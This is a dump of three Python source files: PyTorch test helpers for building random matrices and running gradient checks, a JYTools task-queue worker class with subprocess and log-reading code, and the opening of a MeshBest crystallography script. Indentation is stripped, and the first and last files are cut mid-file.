assert shape[-1] == shape[-2]
t = make_tensor(shape, device=device, dtype=dtype)
t = torch.matmul(t, t.transpose(-2, -1))
i = torch.eye(shape[-1], device=device, dtype=dtype) * 1e-5
return t + i
def random_hermitian_pd_matrix(matrix_size, *batch_dims, dtype, device):
"""
Returns a batch of random Hermitian positive-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_hermitian_pd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
dtype=dtype, device=device)
return torch.matmul(A, A.transpose(-2, -1).conj()) \
+ torch.eye(matrix_size, dtype=dtype, device=device)
# TODO: remove this (prefer make_fullrank_matrices_with_distinct_singular_values below)
def random_fullrank_matrix_distinct_singular_value(matrix_size, *batch_dims,
**kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
silent = kwargs.get("silent", False)
if silent and not torch._C.has_lapack:
return torch.ones(matrix_size, matrix_size, dtype=dtype, device=device)
A = torch.randn(batch_dims + (matrix_size, matrix_size), dtype=dtype, device=device)
u, _, vh = torch.linalg.svd(A, full_matrices=False)
real_dtype = A.real.dtype if A.dtype.is_complex else A.dtype
s = torch.arange(1., matrix_size + 1, dtype=real_dtype, device=device).mul_(1.0 / (matrix_size + 1))
return (u * s.to(A.dtype)) @ vh
# Creates a full rank matrix with distinct signular values or
# a batch of such matrices
# Shape must be a square matrix or batch of square matrices
def make_fullrank_matrices_with_distinct_singular_values(*shape, device, dtype):
assert shape[-1] == shape[-2]
t = make_tensor(shape, device=device, dtype=dtype)
u, _, vh = torch.linalg.svd(t, full_matrices=False)
# TODO: improve the handling of complex tensors here
real_dtype = t.real.dtype if t.dtype.is_complex else t.dtype
s = torch.arange(1., shape[-1] + 1, dtype=real_dtype, device=device).mul_(1.0 / (shape[-1] + 1))
return (u * s.to(dtype)) @ vh
def random_matrix(rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices.
Parameters:
dtype - the data type
device - the device kind
singular - when True, the output will be singular
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
silent = kwargs.get("silent", False)
singular = kwargs.get("singular", False)
if silent and not torch._C.has_lapack:
return torch.ones(rows, columns, dtype=dtype, device=device)
A = torch.randn(batch_dims + (rows, columns), dtype=dtype, device=device)
u, _, vh = torch.linalg.svd(A, full_matrices=False)
k = min(rows, columns)
s = torch.linspace(1 / (k + 1), 1, k, dtype=dtype, device=device)
if singular:
# make matrix singular
s[k - 1] = 0
if k > 2:
# increase the order of singularity so that the pivoting
# in LU factorization will be non-trivial
s[0] = 0
return (u * s.unsqueeze(-2)) @ vh
def random_lowrank_matrix(rank, rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices with
given rank.
"""
B = random_matrix(rows, rank, *batch_dims, **kwargs)
C = random_matrix(rank, columns, *batch_dims, **kwargs)
return B.matmul(C)
def random_sparse_matrix(rows, columns, density=0.01, **kwargs):
"""Return rectangular random sparse matrix within given density.
The density of the result approaches to given density as the size
of the matrix is increased and a relatively small value of density
is specified but higher than min(rows, columns)/(rows * columns)
for non-singular matrices.
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
singular = kwargs.get("singular", False)
k = min(rows, columns)
nonzero_elements = max(min(rows, columns), int(rows * columns * density))
row_indices = [i % rows for i in range(nonzero_elements)]
column_indices = [i % columns for i in range(nonzero_elements)]
random.shuffle(column_indices)
indices = [row_indices, column_indices]
values = torch.randn(nonzero_elements, dtype=dtype, device=device)
# ensure that the diagonal dominates
values *= torch.tensor([-float(i - j)**2 for i, j in zip(*indices)], dtype=dtype, device=device).exp()
indices_tensor = torch.tensor(indices)
A = torch.sparse_coo_tensor(indices_tensor, values, (rows, columns), device=device)
return A.coalesce()
def random_sparse_pd_matrix(matrix_size, density=0.01, **kwargs):
"""Return random sparse positive-definite matrix with given density.
The eigenvalues of the matrix are defined as::
arange(1, matrix_size+1)/matrix_size
Algorithm:
A = diag(arange(1, matrix_size+1)/matrix_size)
while <A density is smaller than required>:
<choose random i, j in range(matrix_size), theta in [0, 2*pi]>
R = <rotation matrix (i,j,theta)>
A = R^T A R
"""
import math
torch = kwargs.get('torch', globals()['torch'])
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
data = dict([((i, i), float(i + 1) / matrix_size)
for i in range(matrix_size)])
def multiply(data, N, i, j, cs, sn, left=True):
for k in range(N):
if left:
ik, jk = (k, i), (k, j)
else:
ik, jk = (i, k), (j, k)
aik, ajk = data.get(ik, 0), data.get(jk, 0)
aik, ajk = cs * aik + sn * ajk, -sn * aik + cs * ajk
if aik:
data[ik] = aik
else:
data.pop(ik, None)
if ajk:
data[jk] = ajk
else:
data.pop(jk, None)
target_nnz = density * matrix_size * matrix_size
while len(data) < target_nnz:
i = random.randint(0, matrix_size - 1)
j = random.randint(0, matrix_size - 1)
if i != j:
theta = random.uniform(0, 2 * math.pi)
cs = math.cos(theta)
sn = math.sin(theta)
multiply(data, matrix_size, i, j, cs, sn, left=True)
multiply(data, matrix_size, i, j, cs, sn, left=False)
icoords, jcoords, values = [], [], []
for (i, j), v in sorted(data.items()):
icoords.append(i)
jcoords.append(j)
values.append(v)
indices_tensor = torch.tensor([icoords, jcoords])
return torch.sparse_coo_tensor(indices_tensor, values, (matrix_size, matrix_size), dtype=dtype, device=device)
def do_test_dtypes(self, dtypes, layout, device):
for dtype in dtypes:
if dtype != torch.float16:
out = torch.zeros((2, 3), dtype=dtype, layout=layout, device=device)
self.assertIs(dtype, out.dtype)
self.assertIs(layout, out.layout)
self.assertEqual(device, out.device)
def do_test_empty_full(self, dtypes, layout, device):
shape = torch.Size([2, 3])
def check_value(tensor, dtype, layout, device, value, requires_grad):
self.assertEqual(shape, tensor.shape)
self.assertIs(dtype, tensor.dtype)
self.assertIs(layout, tensor.layout)
self.assertEqual(tensor.requires_grad, requires_grad)
if tensor.is_cuda and device is not None:
self.assertEqual(device, tensor.device)
if value is not None:
fill = tensor.new(shape).fill_(value)
self.assertEqual(tensor, fill)
def get_int64_dtype(dtype):
module = '.'.join(str(dtype).split('.')[1:-1])
if not module:
return torch.int64
return operator.attrgetter(module)(torch).int64
default_dtype = torch.get_default_dtype()
check_value(torch.empty(shape), default_dtype, torch.strided, -1, None, False)
check_value(torch.full(shape, -5.), default_dtype, torch.strided, -1, None, False)
for dtype in dtypes:
for rg in {dtype.is_floating_point, False}:
int64_dtype = get_int64_dtype(dtype)
v = torch.empty(shape, dtype=dtype, device=device, layout=layout, requires_grad=rg)
check_value(v, dtype, layout, device, None, rg)
out = v.new()
check_value(torch.empty(shape, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, None, rg)
check_value(v.new_empty(shape), dtype, layout, device, None, False)
check_value(v.new_empty(shape, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
check_value(torch.empty_like(v), dtype, layout, device, None, False)
check_value(torch.empty_like(v, dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
if dtype is not torch.float16 and layout != torch.sparse_coo:
fv = 3
v = torch.full(shape, fv, dtype=dtype, layout=layout, device=device, requires_grad=rg)
check_value(v, dtype, layout, device, fv, rg)
check_value(v.new_full(shape, fv + 1), dtype, layout, device, fv + 1, False)
out = v.new()
check_value(torch.full(shape, fv + 2, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, fv + 2, rg)
check_value(v.new_full(shape, fv + 3, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 3, False)
check_value(torch.full_like(v, fv + 4), dtype, layout, device, fv + 4, False)
check_value(torch.full_like(v, fv + 5,
dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 5, False)
# this helper method is to recursively
# clone the tensor-type input of operators tested by OpInfo
def clone_input_helper(input):
if isinstance(input, torch.Tensor):
return torch.clone(input)
if isinstance(input, Sequence):
return tuple(map(clone_input_helper, input))
return input
THESE_TAKE_WAY_TOO_LONG = {
'test_Conv3d_groups',
'test_conv_double_backward',
'test_conv_double_backward_groups',
'test_Conv3d_dilated',
'test_Conv3d_stride_padding',
'test_Conv3d_dilated_strided',
'test_Conv3d',
'test_Conv2d_dilated',
'test_ConvTranspose3d_dilated',
'test_ConvTranspose2d_dilated',
'test_snli',
'test_Conv2d',
'test_Conv2d_padding',
'test_ConvTranspose2d_no_bias',
'test_ConvTranspose2d',
'test_ConvTranspose3d',
'test_Conv2d_no_bias',
'test_matmul_4d_4d',
'test_multinomial_invalid_probs',
}
running_script_path = None
def set_running_script_path():
global running_script_path
try:
running_file = os.path.abspath(os.path.realpath(sys.argv[0]))
if running_file.endswith('.py'): # skip if the running file is not a script
running_script_path = running_file
except Exception:
pass
def check_test_defined_in_running_script(test_case):
if running_script_path is None:
return
test_case_class_file = os.path.abspath(os.path.realpath(inspect.getfile(test_case.__class__)))
assert test_case_class_file == running_script_path, "Class of loaded TestCase \"{}\" " \
"is not defined in the running script \"{}\", but in \"{}\". Did you " \
"accidentally import a unittest.TestCase from another file?".format(
test_case.id(), running_script_path, test_case_class_file)
def load_tests(loader, tests, pattern):
set_running_script_path()
test_suite = unittest.TestSuite()
for test_group in tests:
for test in test_group:
check_test_defined_in_running_script(test)
test_suite.addTest(test)
return test_suite
class BytesIOContext(io.BytesIO):
def __enter__(self):
return self
def __exit__(self, *args):
pass
# Tentative value for nondet_tol for gradcheck when backward implementation
# relies on nondeterministic operations, i.e., those listed here:
# https://pytorch.org/docs/stable/generated/torch.use_deterministic_algorithms.html
#
# For more information see https://github.com/pytorch/pytorch/issues/56202
GRADCHECK_NONDET_TOL = 1e-12
def gradcheck(fn, inputs, **kwargs):
# Wrapper around gradcheck that enables certain keys by default.
# Use this testing-internal gradcheck instead of autograd.gradcheck so that new features like vmap and
# forward-mode AD are tested by default. We create this wrapper because we'd like to keep new checks
# to be disabled to default for the public-facing api to avoid breaking user code.
#
# All PyTorch devs doing testing should use this wrapper instead of autograd.gradcheck.
default_values = {
"check_batched_grad": True,
"fast_mode": True,
}
if os.environ.get('PYTORCH_TEST_WITH_SLOW_GRADCHECK', "0FF") == "ON":
default_values["fast_mode"] = False
for key, value in default_values.items():
# default value override values explicitly set to None
k = kwargs.get(key, None)
kwargs[key] = k if k is not None else value
return torch.autograd.gradcheck(fn, inputs, **kwargs)
def gradgradcheck(fn, inputs, grad_outputs=None, **kwargs):
# Wrapper around gradgradcheck that enables certain keys by default
# See gradcheck above for an explanation of why we need something like this.
#
# All PyTorch devs doing testing should use this wrapper instead of autograd.gradgradcheck
default_values = {
"check_batched_grad": True,
"fast_mode": True,
}
if os.environ.get('PYTORCH_TEST_WITH_SLOW_GRADCHECK', "0FF") == "ON":
default_values["fast_mode"] = False
for key, value in default_values.items():
# default value override values explicitly set to None
k = kwargs.get(key, None)
kwargs[key] = k if k is not None else value
return torch.autograd.gradgradcheck(fn, inputs, grad_outputs, **kwargs)
def _assertGradAndGradgradChecks(test_case, apply_fn, inputs, **kwargs):
# call assert function rather than returning a bool since it's nicer
# if we get whether this failed on the gradcheck or the gradgradcheck.
test_case.assertTrue(gradcheck(apply_fn, inputs, **kwargs))
test_case.assertTrue(gradgradcheck(apply_fn, inputs, **kwargs))
@contextmanager
def set_cwd(path: str) -> Iterator[None]:
old_cwd = os.getcwd()
try:
os.chdir(path)
yield
finally:
os.chdir(old_cwd)
# Using @precisionOverride specific to your test is the recommended way
# of doing this. These are just some values that worked for test_nn.
dtype2prec_DONTUSE = {torch.float: 1e-5,
torch.double: 1e-5,
torch.half: 1e-2,
torch.bfloat16: 1e-1}
def _wrap_warn_once(regex):
def decorator(fn):
def inner(self, *args, **kwargs):
with self.assertWarnsOnceRegex(UserWarning, regex):
fn(self, *args, **kwargs)
return inner
return decorator
# This is a wrapper that wraps a test to run this test twice, one with
# coalesced=True, another with coalesced=False for coalesced/uncoalesced sparse tensors.
def coalescedonoff(f):
@wraps(f)
def wrapped(self, *args, **kwargs):
f(self, *args, **kwargs, coalesced=True)
f(self, *args, **kwargs, coalesced=False)
return wrapped
@contextlib.contextmanager
def disable_gc():
if gc.isenabled():
try:
gc.disable()
yield
finally:
gc.enable()
else:
yield
def find_library_location(lib_name: str) -> Path:
# return the shared library file in the installed folder if exist,
# else the file in the build folder
torch_root = Path(torch.__file__).resolve().parent
path = torch_root / 'lib' / lib_name
if os.path.exists(path):
return path
torch_root = Path(__file__).resolve().parent.parent.parent
return torch_root / 'build' / 'lib' / lib_name
def sandcastle_skip(reason):
"""
Similar to unittest.skip, however in the sandcastle environment it just
"passes" the test instead to avoid creating tasks complaining about tests
skipping continuously.
"""
def decorator(func):
if not IS_SANDCASTLE:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = reason
return func
@wraps(func)
def wrapper(*args, **kwargs):
print(f'Skipping {func.__name__} on sandcastle for following reason: {reason}', file=sys.stderr)
return
return wrapper
return decorator
def mock_wrapper(method):
"""
Returns a function that calls the real implementation of a method
in addition to passing args to a mock object.
"""
mock = MagicMock()
@wraps(method)
def wrapper(self, *args, **kwargs):
mock(*args, **kwargs)
return method(self, *args, **kwargs)
wrapper.mock = mock # type: ignore[attr-defined]
return wrapper
def get_tensors_from(args, kwargs):
""" Returns a set of all Tensor objects in the given args and kwargs. """
return set([arg for arg in args if isinstance(arg, Tensor)] +
[v for v in kwargs.values() if isinstance(v, Tensor)])
def has_breakpad():
# We always build with breakpad in CI
if IS_IN_CI:
return True
# If not on a special build, check that the library was actually linked in
try:
torch._C._get_minidump_directory() # type: ignore[attr-defined]
return True
except RuntimeError as e:
if "Minidump handler is uninintialized" in str(e):
return True
return False
def sandcastle_skip_if(condition, reason):
"""
Similar to unittest.skipIf, however in the sandcastle environment it just
"passes" the test instead to avoid creating tasks complaining about tests
skipping continuously.
"""
def decorator(func):
if not IS_SANDCASTLE and condition:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = reason
return func
@wraps(func)
def wrapper(*args, **kwargs):
if condition and IS_SANDCASTLE:
print(f'Skipping {func.__name__} on sandcastle for following reason: {reason}', file=sys.stderr)
return
else:
return func(*args, **kwargs)
return wrapper
return decorator
|
_Worker.py
|
#! /usr/bin/env python
# coding: utf-8
import os
import re
import sys
import signal
import json
import uuid
import types
import subprocess
from time import time, sleep
import threading
import logging
import traceback
from JYTools import StringTool
from JYTools.JYWorker.util import ValueVerify, ReportScene
from ._exception import TaskErrorException, InvalidTaskException, WorkerTaskParamsKeyNotFound
from ._exception import WorkerTaskParamsValueTypeError
from ._Task import TaskStatus, WorkerTask, WorkerTaskParams, TaskType
from ._config import WorkerConfig, WorkerLogConfig
__author__ = 'meisanggou'
class _WorkerLog(WorkerLogConfig):
def worker_log(self, *args, **kwargs):
pass
def task_log(self, *args, **kwargs):
pass
"""
add in 0.7.5
"""
def task_debug_log(self, *args, **kwargs):
kwargs.update(level="DEBUG")
self.task_log(*args, **kwargs)
"""
add in 1.9.1
"""
def task_warning_log(self, *args, **kwargs):
kwargs.update(level="WARNING")
self.task_log(*args, **kwargs)
class Worker(WorkerConfig, _WorkerLog):
"""
expect_params_type
add in version 0.6.9
"""
expect_params_type = None
def __init__(self, log_dir=None, work_tag=None, **kwargs):
WorkerConfig.__init__(self, work_tag=work_tag, **kwargs)
_WorkerLog.__init__(self, log_dir=log_dir, **kwargs)
if StringTool.is_string(self.work_tag) is False:
class_name = self.__class__.__name__
msg = "Need String work_tag. Please Set {0}.DEFAULT_WORK_TAG=yourWorkTag Or {0}(work_tag=yourWorkTag)"
raise TypeError(msg.format(class_name))
if ValueVerify.v_work_tag(self.work_tag) is False:
raise ValueError("Invalid work_tag format")
self._id = uuid.uuid4().hex # add in 0.9.11
self._msg_manager = None
self.is_running = False # 表示worker是否已经开始运行,并不断接收任务,一旦运行起来,不可再进入test模式即调用test方法
self._debug = False
self.before_handle_funcs = []
self.after_handle_funcs = []
self.init_log_dir()
self._handle_task_func = self.handle_task
self.num_success_job = 0 # add in 0.8.1
self.num_fail_job = 0 # add in 0.8.1
self.num_wrongful_job = 0 # add in 0.8.1
self.num_invalid_job = 0 # add in 0.8.1
self.num_null_job = 0 # add in 0.8.1
self.num_pop_task = 0 # add in 1.6.8 尝试去获得任务的次数(无论是否获得数据,无论从哪个队列中获得)
if "worker_index" in kwargs:
self.worker_index = kwargs["worker_index"]
if "redirect_stdout" in kwargs:
self.redirect_stdout = kwargs["redirect_stdout"]
self.heartbeat_key = self.heartbeat_prefix_key + "_" + self.work_tag
self.queue_key = self.queue_prefix_key + "_" + self.work_tag
# 延时队列,该队列和普通queue相对,访问一定次数的普通queue才会访问一次该队列
self.delay_queue_key = self.queue_prefix_key + "_" + self.work_tag + "@delay"
self.clock_key = self.clock_prefix_key + "_" + self.work_tag + "_" + self._id
self.current_task = WorkerTask()
self._worker_status = 0 # 内部运行状态。目前主要用于 当收到kill信号时的处理
"""
add in 0.4.0
"""
def init_log_dir(self):
if self.log_dir is not None:
exclusive_log_dir = os.path.join(self.log_dir, self.work_tag.lower())
if os.path.isdir(exclusive_log_dir):
self.log_dir = exclusive_log_dir
else:
try:
os.mkdir(exclusive_log_dir)
self.log_dir = exclusive_log_dir
except OSError:
pass
"""
property
add in 0.6.9
"""
@property
def debug(self):
return self._debug
@debug.setter
def debug(self, v):
if self.is_running is True:
return
if not isinstance(v, bool):
raise TypeError("need bool value for debug")
self._debug = v
if self.debug is True:
self.redirect_stdout = False
@property
def num_total_job(self):
r_job = self.num_worked_job
t_job = r_job + self.num_wrongful_job + self.num_null_job
return t_job
@property
def num_worked_job(self):
return self.num_success_job + self.num_fail_job + self.num_invalid_job
def has_heartbeat(self):
return True
def write(self, *args, **kwargs):
self.task_log(*args, **kwargs)
def push_task(self, key, params, work_tag=None, sub_key=None, is_report=False):
pass
@staticmethod
def _subprocess_timeout_thread(p, timeout):
"""
add in version 0.7.7
:param p:
:param timeout:
:return:
"""
while timeout > 0:
r_code = p.poll()
if r_code is not None:
return
timeout -= 1
sleep(1)
p.kill()
return
def execute_subprocess(self, cmd, stdout=None, stderr=None, error_continue=False, timeout=None, out_file=None):
self.task_debug_log(cmd)
if isinstance(cmd, list) is True:
cmd = map(lambda x: str(x) if isinstance(x, int) else x, cmd)
if out_file is not None:
std_out = open(out_file, mode="w")
else:
std_out = stdout
if std_out is None and len(cmd) > 2 and cmd[-2] == ">":
std_out = open(cmd[-1], mode="w")
cmd = cmd[:-2]
std_err = stderr
if std_out is None:
std_out = subprocess.PIPE
if std_err is None:
if std_out == subprocess.PIPE:
std_err = subprocess.STDOUT
else:
std_err = subprocess.PIPE
child = subprocess.Popen(cmd, stderr=std_err, stdout=std_out)
if isinstance(timeout, int) and timeout > 0:
t_timeout = threading.Thread(target=self._subprocess_timeout_thread, args=(child, timeout))
t_timeout.start()
else:
t_timeout = None
if child.stdout is not None:
std_log = child.stdout
elif child.stderr is not None:
std_log = child.stderr
else:
std_log = None
exec_msg = ""
while std_log:
out_line = std_log.readline()
if out_line is None or len(out_line) <= 0:
break
exec_msg += out_line
self.task_log(out_line)
child.wait()
if t_timeout is not None:
t_timeout.join()
r_code = child.returncode
if r_code != 0:
if error_continue is False:
self.set_current_task_error(cmd[0], " exit code not 0, is ", r_code)
else:
self.task_debug_log(cmd[0], " exit code not 0, is ", r_code, " but continue return.")
else:
self.task_debug_log(cmd[0], " exit code 0")
return r_code, exec_msg
def _execute(self):
if self.current_task.task_name is not None:
self.worker_log("Start Execute", self.current_task.task_key, self.current_task.task_name)
else:
self.worker_log("Start Execute", self.current_task.task_key)
self.hang_up_clock(1)
self.current_task.start_time = time()
standard_out = None
try:
for func in self.before_handle_funcs:
func()
if self.redirect_stdout is True:
standard_out = sys.stdout
sys.stdout = self
self.current_task.task_status = TaskStatus.RUNNING
if self.current_task.task_type == TaskType.Normal and self.current_task.task_report_tag is not None:
if ReportScene.include_begin(self.current_task.task_report_scene) is True:
self.task_debug_log("Start Report Task Running Status")
self.push_task(self.current_task.task_key, self.current_task.to_dict(),
work_tag=self.current_task.task_report_tag, sub_key=self.current_task.task_sub_key,
is_report=True)
if self.current_task.task_type == TaskType.Normal:
self._handle_task_func(self.current_task.task_key, self.current_task.task_params)
elif self.current_task.task_type == TaskType.Control:
self.handle_control(**self.current_task.task_params)
else:
self.handle_report_task()
if self.current_task.task_status == TaskStatus.RUNNING:
self.current_task.task_status = TaskStatus.SUCCESS
if standard_out is not None:
sys.stdout = standard_out
for func in reversed(self.after_handle_funcs):
func()
self.num_success_job += 1
except WorkerTaskParamsKeyNotFound as pk:
self.current_task.task_status = TaskStatus.FAIL
self.current_task.task_message = "Need Key %s, Not Found." % pk.missing_key
self.task_log(self.current_task.task_message, level="ERROR")
self.num_invalid_job += 1
except WorkerTaskParamsValueTypeError as pvt:
self.current_task.task_status = TaskStatus.FAIL
self.current_task.task_message = "Need Value Type %s, Not Match." % pvt.except_type
self.task_log(self.current_task.task_message, level="ERROR")
self.num_invalid_job += 1
except TaskErrorException as te:
self.current_task.task_status = TaskStatus.FAIL
self.current_task.task_message = te.error_message
self.worker_log("Task: ", te.key, "Params: ", te.params, " Error Info: ", te.error_message)
self.task_log(te.error_message, level="ERROR")
self.num_fail_job += 1
except InvalidTaskException as it:
self.current_task.task_status = TaskStatus.INVALID
self.current_task.task_message = it.invalid_message
self.task_log(it.invalid_message, level="WARING")
self.worker_log("Invalid Task ", it.task_info, " Invalid Info: ", it.invalid_message)
self.num_invalid_job += 1
except Exception as e:
if TaskStatus.is_fail(self.current_task.task_status) is False:
# 防止重复设置FAIL和覆盖用户设置的Fail
self.current_task.task_status = TaskStatus.FAIL
self.current_task.task_message = str(e)
self.task_log(traceback.format_exc(), level="ERROR")
self._execute_error(e)
self.num_fail_job += 1
except SystemExit as se:
if self.is_running is False:
sys.exit(se.code)
self.current_task.task_status = TaskStatus.FAIL
self.current_task.task_message = str(se)
self.task_log(traceback.format_exc(), level="ERROR")
self.num_fail_job += 1
finally:
if standard_out is not None:
sys.stdout = standard_out
self.current_task.end_time = time()
if self.current_task.auto_report is True and self.current_task.task_report_tag is not None:
self.task_debug_log("Start Report Task Status")
self.push_task(self.current_task.task_key, self.current_task.to_dict(),
work_tag=self.current_task.task_report_tag, sub_key=self.current_task.task_sub_key,
is_report=True)
use_time = self.current_task.end_time - self.current_task.start_time
self.task_debug_log("Use ", use_time, " Seconds")
self.worker_log("Completed Task", self.current_task.task_key)
task_output = self.current_task.task_output
task_status = self.current_task.task_status
self.current_task = None
return task_status, task_output
def _execute_error(self, e):
if self.handler_task_exception is not None:
self.handler_task_exception(e)
# 待废弃 被handle_task替代
def handler_task(self, key, params):
pass
# 子类需重载的方法
def handle_task(self, key, params):
self.handler_task(key, params)
# 待废弃 被handle_report_task替代
def handler_report_task(self):
"""
add in version 0.1.19
"""
pass
def handle_report_task(self):
self.handler_report_task()
# 子类需重载的方法
def handler_task_exception(self, e):
pass
# 子类需重载的方法
def handle_control(self, expected_status, **params):
self.set_current_task_invalid("Worker not support control task status")
def handle_invalid_task(self, task_info, error_info):
pass
def hang_up_clock(self, freq=None):
pass
def hang_down_clock(self):
pass
def set_current_task_invalid(self, *args):
"""
add in version 0.1.14
"""
if self.current_task.task_key is not None:
raise InvalidTaskException(self.current_task.task_key, self.current_task.task_params, self.current_task,
*args)
def set_current_task_error(self, *args):
"""
add in version 0.1.18
"""
if self.current_task.task_key is not None:
raise TaskErrorException(self.current_task.task_key, self.current_task.task_params, *args)
def set_output(self, key, value):
self.task_debug_log("Task Out ", key, ": ", value)
if isinstance(self.current_task, WorkerTask):
self.current_task.task_output[key] = value
def set_multi_output(self, **kwargs):
for key, value in kwargs.items():
self.set_output(key, value)
@property
def msg_manager(self):
return self._msg_manager
@msg_manager.setter
def msg_manager(self, msg_manager):
if msg_manager is None:
return
if hasattr(msg_manager, "publish_message") is False:
return
if isinstance(msg_manager.publish_message, types.MethodType) is False:
return
self._msg_manager = msg_manager
def publish_message(self, message):
"""
add in version 0.1.4
"""
if self.msg_manager is None:
return
try:
self.msg_manager.publish_message(message, self.work_tag)
except Exception as e:
logging.error(e)
def run(self, wash_old=False):
pass
def test(self, key, params=None, params_path=None, sub_key=None, report_tag=None, report_scene=None, debug=True):
if self.is_running is True: # 一旦运行起来,不可再进入test模式即调用test方法
raise RuntimeError("Can not test, current is running")
self.debug = debug
if params is None and params_path is not None:
with open(params_path, "r") as rp:
c = rp.read()
params = json.loads(c)
task_item = WorkerTask(work_tag=self.work_tag, task_key=key, task_sub_key=sub_key, task_report_tag=report_tag)
if report_scene is not None:
task_item.set(task_report_scene=report_scene)
if self.expect_params_type is not None:
if not isinstance(params, self.expect_params_type):
raise TypeError("params should", self.expect_params_type)
if isinstance(params, dict):
task_item.set(task_params=WorkerTaskParams(**params))
task_item.task_params.debug_func = self.task_debug_log
else:
task_item.set(task_params=params)
if StringTool.is_string(self.log_dir) is True:
log_name = StringTool.join_encode([self.work_tag, "_", task_item.task_key, ".log"], join_str="")
task_item.log_path = StringTool.path_join(self.log_dir, log_name)
self.current_task = task_item
return self._execute()
def handle_sign(self, sign, frame):
self.task_log("Worker Receive SIGN", sign)
self.close(sign)
def work(self, daemon=False, wash_old=True):
"""
add in version 0.1.8
"""
# handle SIGINT 2 from ctrl+c
signal.signal(signal.SIGINT, self.handle_sign)
# handle SIGTERM 15 from kill
signal.signal(signal.SIGTERM, self.handle_sign)
# handle
signal.signal(signal.SIGUSR1, self.handle_sign)
signal.signal(signal.SIGUSR2, self.handle_sign)
if daemon is not False:
self.debug = False
try:
pid = os.fork()
if pid == 0: # pid大于0代表是父进程 返回的是子进程的pid pid==0为子进程
self.run(wash_old)
except OSError:
sys.exit(1)
else:
self.run(wash_old)
def close(self, exit_code=0):
self.is_running = False
self.hang_down_clock()
self.worker_log("start close. exit code: %s" % exit_code)
sys.exit(exit_code)
"""
ReadWorkerLog Add In Version 1.0.4
"""
class ReadWorkerLog(WorkerLogConfig):
log_pattern = r"^\[[\s\S]+?\](\[[\s\S]*?\]|) (\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}): ([a-z]{1,10}) ([\s\S]*)"
log_compile = re.compile(log_pattern, re.I)
log_level = dict(DEBUG=("DEBUG", "INFO", "WARING", "WARNING", "ERROR"), INFO=("INFO", "WARING", "WARNING", "ERROR"),
WARNING=("WARING", "WARNING", "ERROR"), ERROR=("ERROR", ))
def read_task_log(self, work_tag, key, sub_key=None, sub_key_prefix=None, level="INFO", max_length=1000000):
"""
:param work_tag:
:param key:
:param sub_key: 为None时查询所有有子key和无子key的日志,为空字符串时仅查询无子key的日志,为具体某个子key时查询具体子key的日志
:param level: 默认为INFO,允许DEBUG,INFO,WARNING,ERROR。其他值认为是INFO
:return:
"""
name = StringTool.join([work_tag, "_", key, ".log"], "")
log_path = StringTool.path_join(self.log_dir, work_tag.lower(), name)
if os.path.exists(log_path) is False:
log_path = StringTool.path_join(self.log_dir, name)
if os.path.exists(log_path) is False:
return False, None
s_log = os.stat(log_path)
read_seek = s_log.st_size - max_length if max_length < s_log.st_size else 0
# 处理参数
if sub_key is not None:
sub_key = StringTool.encode(sub_key)
if sub_key_prefix is not None:
sub_key_prefix = StringTool.encode(sub_key_prefix)
if StringTool.is_string(level) is False:
level = "INFO"
level = level.upper()
if level not in self.log_level:
level = "INFO"
allow_levels = self.log_level[level]
logs_list = []
last_save = False
with open(log_path, "r") as rl:
rl.seek(read_seek)
c = rl.read()
all_lines = c.split("\n")
for line in all_lines:
rl = self.log_compile.match(line)
if rl is not None:
line_sub_key = rl.groups()[0]
log_time = rl.groups()[1]
if len(line_sub_key) >= 2:
line_sub_key = line_sub_key[1:-1]
line_level = rl.groups()[2]
log_msg = rl.groups()[3]
if sub_key is not None and sub_key != line_sub_key:
last_save = False
continue
if sub_key_prefix is not None and line_sub_key.startswith(sub_key_prefix) is False:
last_save = False
continue
if line_level not in allow_levels:
last_save = False
continue
last_save = True
logs_list.append(map(StringTool.decode, [line_sub_key, log_time, line_level, log_msg]))
elif last_save is True:
logs_list[-1][3] = StringTool.join_decode([logs_list[-1][3], line])
return True, logs_list
|
sizecorr.py
|
'''
Created on May 15, 2018
@author: melnikov
'''
import numpy
import base64
from scipy import signal
import multiprocessing as mp
try:
from workflow_lib import workflow_logging
logger = workflow_logging.getLogger()
except:
import logging
logger = logging.getLogger("MeshBest")
def SpotMatrix(n):
profile = numpy.ones((2*n+1, 2*n+1))
for index in numpy.ndindex(numpy.shape(profile)):
j, i = index
if ((i-n)**2+(j-n)**2)>=n**2:
profile[index] = 0
return profile/numpy.sum(profile)**(0.75)
def SpotMatrix_t(n1, n2):
profile = numpy.ones((2*n1+1, 2*n2+1))
for index in numpy.ndindex(numpy.shape(profile)):
j, i = index
if (((i-n1)/n1)**2+((j-n2)/n2)**2)>=1:
profile[index] = 0
return profile/numpy.sum(profile)**(0.75)
def GenerateGaussian2D(x, y, mu, sigma):
gauss = 1/(6.28*sigma**2)*numpy.exp(-( ((x-mu[0])**2+(y-mu[1])**2) / ( 2.0 * sigma**2 ) ) )
return gauss
def BestCorr_MP(queue):
dx = size_x*1000
dy = size_y*1000
mind = min(dx, dy)
maxd = max(dx, dy)
Set = [float(x) for x in AvailableApertures if x>=mind]
while True:
Value = queue.get()
if Value == None:
break
where = numpy.where(Ztable == Value)
if len(where[0]) * len(where[1]) == 1:
# simple case of single image
xy = (float(where[1]) + 1, float(where[0]) + 1)
size = 1.0
score = (3.14/4)*mind**2*Dtable[where[0], where[1]]
ResultArray = numpy.array([[xy[0], xy[1], size, score]])
